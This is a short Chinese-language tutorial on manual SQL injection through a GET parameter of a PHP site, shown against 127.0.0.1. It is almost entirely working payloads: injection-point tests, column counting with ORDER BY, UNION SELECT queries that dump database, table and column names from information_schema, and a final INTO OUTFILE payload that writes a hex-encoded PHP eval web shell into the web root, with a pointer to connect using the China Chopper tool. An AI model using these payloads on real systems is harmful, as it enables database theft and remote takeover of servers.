一個帶get型參數並且存在從數據庫中返回數據的網站:
http://127.0.0.1/index.php?id=1
可以進行如下嘗試檢測是否存在注入點:
http://127.0.0.1/index.php?id=1 and 1=1
http://127.0.0.1/index.php?id=1 and 1=2
http://127.0.0.1/index.php?id=1'order by 1%23
http://127.0.0.1/index.php?id=1'order by 2%23
一直到報錯...
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 %23
得到顯示字段2
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,user(),3 %23
查看當前數據庫的賬戶的權限
爆庫名:
http://127.0.0.1/index.php?id=1' and1=2 union select 1,group_concat(distinct schema_name),3 frominformation_schema.schemata %23
爆表名:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,group_concat(distinct table_name),3 from information_schema.tables where table_schema=database()%23
爆字段名:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,group_concat(distinct column_name),3 from information_schema.columns where table_schema=database() and table_name=0x6269616f6d696e67%23
注:
0x6269616f6d696e67爲表名的十六進制;
這裏可以直接使用firefox的hackbar插件直接轉換;
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,group_concat(distinct ziduan_name),3 from table_name%23
注:
ziduan_name爲要查詢的字段名;
table_name爲表名;
利用get注入寫入一句話木馬:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,0x3c3f70687020406576616c28245f504f53545b3132335d293b3f3e,3 into outfile 'C:\\WWW\\shell.php'%23
注:
0x3c3f70687020406576616c28245f504f53545b3132335d293b3f3e爲<?php @eval($_POST[123]);?>的十六進制C:\WWW\shell.php爲服務器絕對路徑
接着使用菜刀連接即可。